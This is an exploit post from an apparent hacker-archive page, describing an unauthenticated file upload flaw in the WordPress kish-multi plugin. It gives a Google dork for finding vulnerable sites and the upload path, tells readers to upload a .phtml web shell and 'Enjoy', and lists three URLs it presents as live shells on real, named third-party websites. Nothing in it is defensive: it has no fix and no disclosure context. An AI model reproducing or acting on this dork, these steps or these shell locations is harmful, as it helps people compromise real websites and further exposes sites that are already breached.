facebook facebook twitter rss

WordPress kish-multi Plugin File Upload Vulnerability

Author: X-Bruno , Published: 25-06-2014
############################################################################

# Title : WordPress kish-multi Plugin File Upload Vulnerability

# Author : X-Bruno

# Date : 24/06/2014

# Facebook : http://www.facebook.com/Inj3ct.Bruno

# Email: brunox338@gmail.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/plugins/kish-multi/

# Tested on : Linux



############################################################################

===== > Exploit :


>>> > http://localhost/wordpress/wp-content/plugins/kish-multi/uploadify/


Then Click on "Select Files" & Enjoy



Shell Access ==== > http://localhost/wordpress/wp-content/plugins/kish-multi/uploads/(shell_name.phtml)





Examples : ( Live Shells )

1- http://agrix.es/wp-content/plugins/kish-multi/help.phtml

2- http://www.tropelias.com/wp-content/plugins/kish-multi/help.phtml

3- http://manuelargamasilla.es/wp-content/plugins/kish-multi/help.phtml


#################################################################

# Greeting : Toomy Jone , Syria , Palestine , HunTerS - Team #

#################################################################

Like us on Facebook :